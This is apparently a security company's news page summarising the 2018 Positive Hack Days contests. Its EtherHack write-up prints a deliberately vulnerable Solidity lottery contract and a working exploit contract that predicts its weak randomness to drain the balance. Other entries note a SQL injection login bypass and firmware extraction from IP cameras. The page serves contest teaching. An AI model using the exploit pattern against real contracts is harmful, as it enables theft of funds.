News

10/4/2018

Positive Hack Days 9 to be held May 21–22 at Crocus Expo

The dates of the ninth Positive Hack Days are now out: next year's forum will take place at an all-new venue, the Crocus Expo International Exhibition Center, on May 21–22, 2019. More visitors are coming to PHDays every year: in 2018, over 5,000 people were in attendance. Crocus Expo offers more space than the World Trade Center Moscow, which will enable hosting an even larger number of guests and speakers. Preparations have already started for the event program, The Standoff, and competition infrastructure. The agenda will include several tracks addressing security research, technology-related risks for businesses and governments, and other topics. A new point of emphasis will be the impact of information security on the lives of ordinary people. In addition, effort will be made at PHDays 9 to reach out beyond security practitioners to include developers and IT professionals. A number of talks and workshops will attempt to bridge the gap between the IT and infosec worlds. Timing of the Call for Papers has been announced: proposals from interested speakers will be accepted from January 14 to March 14, 2019. Tickets for PHDays will go on sale in December. As in past years, PHDays promises to excite with its competitions, in which participants demonstrate threats potentially facing critical infrastructure, banking and government systems, blockchain, the Internet of Things, and more. Spring is still over six months away, so in the meantime we encourage you to enjoy the highlights from PHDays 8, recordings of which you can watch online.

8/8/2018

The Standoff at Positive Hack Days 8: attack debriefing

The Standoff was back this year at Positive Hack Days 8, where over 100 participants on 12 attacker teams, 7 defender teams, and security operations center (SOC) teams were eager to show their mastery of the digital systems of an entire mock city. The city network was monitored by three Positive Technologies products:

MaxPatrol SIEM – security information and event management (SIEM)
PT Network Attack Discovery – network traffic analysis, incident detection, and investigation
PT MultiScanner – multilevel system for identifying and blocking malicious content

Functioning of these products and game events were all under the watchful gaze of the Positive Technologies Expert Security Center (PT ESC), which shared its findings with the PHDays audience. So many events took place that it would be impossible to describe them all. Here we will focus on describing the networks of Office 2 (belonging to fictional systems integrator SPUTNIK) and Office 1 (belonging to fictional insurer BeHealthy). Office 2 was interesting because it was monitored by the Rostelecom SOC, but not under the protection of any defender team, so attackers had free run of its systems. Besides these two offices, the city also contained an electrical plant with substation, railroad, smart homes, and banks with ATMs.

7/25/2018

Cyberbattle at PHDays, or How to hack city infrastructure in 30 hours

For the third year running, the highlight of the hacking contests at Positive Hack Days is The Standoff, in which teams of attackers, defenders, and security operations centers (SOCs) do battle in a virtual city. Experience in 2016 and 2017 showed the appeal of this ultrarealistic format for both participants and visitors at PHDays. So there was no doubt among the organizers that The Standoff deserved to return this year. In 2018, a total of 19 teams took part in The Standoff, and for nearly 30 hours, these teams fought for control of the city. The defenders stood fast, but the attackers still managed to pull off some hacks: according to the rules, some targets were deliberately left unprotected. Meanwhile, the battle among the attacker teams for first place was rather hot indeed—the scoreboard was turned nearly upside down just half an hour before the end of play. Read on for a blow-by-blow account of what happened during these two exciting days.

Day 1: Getting the lay of the digital land

Events were slow in coming on the first day. Attackers took their time reconnoitering and learning about the targets. As announced previously, the city's economy was based on digital technologies. City infrastructure included an electrical plant and substation, railroad, office buildings, energy-efficient smart homes, banks with ATMs and self-service kiosks, mobile communications, the Internet, and online services.

6/22/2018

PHDays 8: EtherHack contest writeup

At this year's PHDays, we held an all-new contest named EtherHack. Participants were on the clock as they solved tasks involving smart contract vulnerabilities. Here we present the contest tasks along with a detailed explanation of the intended solutions.

Azino 777

Win the lottery and hit the jackpot!

The first three tasks featured poor randomness issues that were covered in our recent research: Predicting Random Numbers in Ethereum Smart Contracts. As an easy warmup, the first task was based on a pseudorandom number generator (PRNG) that relied on the blockhash of the last block as a source of entropy for generating random numbers:

pragma solidity ^0.4.16;

contract Azino777 {

  function spin(uint256 bet) public payable {
    require(msg.value >= 0.01 ether);
    uint256 num = rand(100);
    if(num == bet) {
        msg.sender.transfer(this.balance);
    }
  }

  // Generate a "random" number between 0 and max (intentionally weak: seeded from the previous block hash)
  uint256 constant private FACTOR = 1157920892373161954235709850086879078532699846656405640394575840079131296399;
  function rand(uint max) constant private returns (uint256 result){
    uint256 factor = FACTOR * 100 / max;
    uint256 lastBlockNumber = block.number - 1;
    uint256 hashVal = uint256(block.blockhash(lastBlockNumber));

    return uint256((uint256(hashVal) / factor)) % max;
  }

  function() public payable {}
}

Because the result of block.blockhash(block.number-1) would be the same for any transaction within the same block, a successful attack could use an exploit contract with the same rand() function to call the target contract via an internal message:

contract WeakRandomAttack {
  Azino777 target;

  function WeakRandomAttack(address _target) public payable {
    target = Azino777(_target);
  }

  function attack() public {
    uint256 num = rand(100);
    target.spin.value(0.01 ether)(num);
  }

  /* rand() is identical to Azino777.rand() above */
}

Private Ryan

We added a private seed, nobody will ever learn it!

This task is a slightly tougher twist on the previous one. A variable seed, deemed private, was used as an offset to block.number so that the blockhash would not be dependent on the previous block. After each bet, seed would be overwritten with a new "random" value. This was the case with the Slotthereum lottery.

contract PrivateRyan {
  uint private seed = 1;

  function PrivateRyan() {
    seed = rand(256);
  }

  function spin(uint256 bet) public payable {
    require(msg.value >= 0.01 ether);
    uint256 num = rand(100);
    seed = rand(256);
    if(num == bet) {
      msg.sender.transfer(this.balance);
    }
  }

  /* ... */
}

As in the previous task, an attacker would just need to copy the rand() function into the exploit contract, but this time the value of the private variable seed would need to be obtained off-chain and then supplied to the exploit as an argument. Marking a variable private only restricts access from other contracts; its value is still readable from contract storage. To do so, one could take advantage of the web3.eth.getStorageAt() method of the web3 library:

6/19/2018

MeterH3cker contest writeup: hacking smart meters at PHDays 8

The contests at this year's Positive Hack Days included MeterH3cker, an all-new competition for hacking the smart grid. Participants had the run of two mock buildings powered by solar panels; excess power was sold back to the grid at a special rate. The job of the participants was to interfere with metering by any means necessary in order to improve their account balance. Stand

6/13/2018

Mr. Robot entertains visitors of PHDays 8

Mr. Robot again cheered guests of Positive Hack Days. This year, people could not only play a quiz, but also upgrade their skills using hacking tools or even have an interview for a job at Positive Technologies! Over 2,000 people came to have a talk with our chatbot, and that certainly boosted its artificial ego :) Keep reading for more details.

What's new?

The robot's software underwent substantial changes. Alexander Melkikh shared upgrade details: "We added new interactive features to our robot: in addition to contests (Quiz and Hacking Crash Course), it now has new activities—Get a Job at Positive Technologies and Meet Your Security Soulmate. Because of that, we had to rewrite the backend. Last year, we had raw PHP that caused us a lot of problems, that's why this time we applied Falcon, an easy-to-use Python web framework."

Contests

The forum visitors enjoyed the contests. The most popular again was the Quiz. The rules are similar to Who Wants to Be a Millionaire: participants answer multiple-choice questions of various complexity. We prepared many sets, each containing five questions that were randomly displayed on the screen. Most questions were tongue-in-cheek, but some were intricate and related to information security, for example reverse engineering. If a participant made a mistake, the robot neglected the first law of robotics for a while and punished the unlucky contestant with a water jet shower so strong that even bystanders got wet. So, everyone could refresh a little in the midst of PHDays :) Winning the Quiz brought no awards, because the robot believes that it's not the winning that counts, it's the taking part and enjoying the process.

No wonder the second most popular contest was the Hacking Crash Course, because we wanted participants to have fun and try their hands at different subjects in a short time. This contest had three courses, about 15 seconds each. The first course, SQL Injection, was a fictitious e-banking website with a form to enter login and password. To bypass authorization, participants had to press the single quote key on the software keyboard and then click Enter. This year, participants could also try out the IDA and Radare disassemblers. The IDA course taught the well-known feature that lists all strings in a binary and is invoked with Shift+F12. The Radare course explained how to quit the disassembler; the authors of the course meant it as a joke about the complicated and obscure key combinations in Radare. The robot was friendly and gave hints: if someone did not know which keys to press, the correct key on the keyboard lit up dimly after a few seconds, so all participants successfully completed their training. Successful completion of the course was confirmed by a certificate with the participant's photo—a webcam above the screen took a photo at course completion.

The most complex and important part of the robot's activity this year was an interview for a job at Positive Technologies. Penetration testers, incident response specialists, and application protection specialists created quizzes for applicants in their respective fields. An applicant chose one of the suggested fields and answered 5 questions drawn from a considerable list. More than one answer could be correct for some questions. If an interview had a positive result, the applicant's photo and test results were sent to the HR chat in Telegram, and a certificate was printed out. The applicant could bring this certificate to the HR stand to receive a gift and continue the interview.

The contest Meet Your Security Soulmate was similar to Tinder, a popular dating application. The only difference was that participants swiped quotations of information security celebrities instead of photos. Some quotations were real, and some were generated based on original utterances. If most chosen quotations were by the same person, the robot showed a photo of this celebrity together with the participant and played a romantic song.

Summary

Statistics confirmed that people are eager to communicate with artificial intelligence. More than two thousand people took part in the robot's contests during the two days of the forum. About 1,800 participants tried the Quiz (in 2017 there were 1,400 participants), and 820 got a water shower for wrong answers (1,300 people were unlucky in 2017). The Hacking Crash Course was taken by 160 people (360 in 2017). The interview for a job at Positive Technologies was taken by 226 people, and 105 participants found their security soulmate.

6/8/2018

PHDays 8: hunting for IP camera zero-days at CAMBreaker

More than 5,000 visitors came to Positive Hack Days this year, the majority of them security professionals. Their creativity and fine-tuned technical intuition were on full display in the hacking contests. CAMBreaker was no exception. In this article, we describe the preparations, techniques, and victors in this marathon of IP camera hacking. At CAMBreaker, any visitor could try out the role of surveillance camera hacker by attempting to obtain unauthorized access to IoT devices and searching for vulnerabilities in firmware source code. Fun prizes awaited the most successful bug hunters! Preparations for the contest began two months in advance. It was not easy by any means! This process consisted of several stages:

1. Choosing which cameras to include.
2. Checking the firmware versions, software, and operability of the cameras.
3. Obtaining the firmware for each camera. Several methods were used:
   - Intercepting firmware during camera updates via an Android app.
   - Downloading firmware from the vendor's official site.
   - Connecting to the device via Telnet.
   - Connecting to the device via UART. This physical protocol (which stands for "universal asynchronous receiver transmitter") is rather old and the most widespread one in use today. The most well-known protocol in the UART family is RS-232 (commonly known as a COM port).
   - Clipping a programmer to the flash chips inside the camera without de-soldering.
   - And if all else fails, de-soldering the chips and reading them with a flash programmer.
4. Configuring static IP addresses and credentials on the cameras.
5. Designing and setting up a local network for the stand at PHDays.
6. Setting up the stand in the demo environment.

Here are a few photos illustrating the work involved:

6/6/2018

HackBattle 2.0: school canteen ICO under attack

In May 2017, Positive Hack Days VII presented a brand new contest named HackBattle, which attracted audience attention. Almost 100 security specialists took part in that contest. The audience was so eager to see the final that the area was packed (more details in last year's review). Inspired by professionals' interest, we decided to hold HackBattle 2.0 at PHDays 8. Learn how the contest went this year, and check if you can solve the tasks.

Participation rules

The contest was held on both days of PHDays. The first day was a qualifying stage: we selected the two strongest and bravest participants, who solved the most tasks in the shortest time. The final of the contest was on the second day. Two hackers attacked the same target, and the first to get through and escalate privileges on the target system was the winner. Security experts commented on the progress, and highlights could be followed on a large screen.

Qualification

As in the previous year, the participants solved CTF-format tasks against the clock. Each participant had 35 minutes to solve 10 tasks and earn points, the amount depending on task complexity. Each participant could take part in qualification only once. This time we took into account the requests of participants of the first HackBattle and allowed the use not only of our workstations but also of participants' own laptops.

6/4/2018

PHDays 8: Competitive Intelligence contest writeup

Held in the weeks leading up to Positive Hack Days, the Competitive Intelligence contest offered a chance to compete at open-source online sleuthing. This year, the contest had a bit of cryptostartup flair: tasks centered around NotSoPositive, a fictional small company holding a typical ICO. The company's imaginary founders and employees, as well as their friends and family, went under the microscope. To succeed, competitors needed to have intricate knowledge of the workings of online services and social networks, combined with skill at making inferences and inspired guesses. Tasks were designed with both veterans and newbies in mind—anyone could walk away with at least one flag. Many tasks fit with each other in a logical sequence, forming entire storylines. Other tasks could be completed independently of the rest, which was why participants were asked to keep a record of information at each step. As an easy warmup, a simple Google search was enough to find the company's page, which was the jumping-off point for all the other tasks:

5/30/2018

PHDays 8: cash-hungry hackers refuse to Leave ATM Alone

Positive Hack Days 8 continued a number of fun traditions from past years, among them the Leave ATM Alone contest. All comers were invited to hack two ATMs provided by our Banking Security partner Alfa Bank (to make things easier for hackers, we specially configured and hid vulnerabilities on the ATMs prior to the contest start). Participants had 15 minutes to bypass security and cash out. Around 40 participants tried their luck, with a total of 40,000 rubles at stake. Leonid Krolle, the Positive Technologies banking security researcher in charge of the contest, told us about the twists and turns that followed.
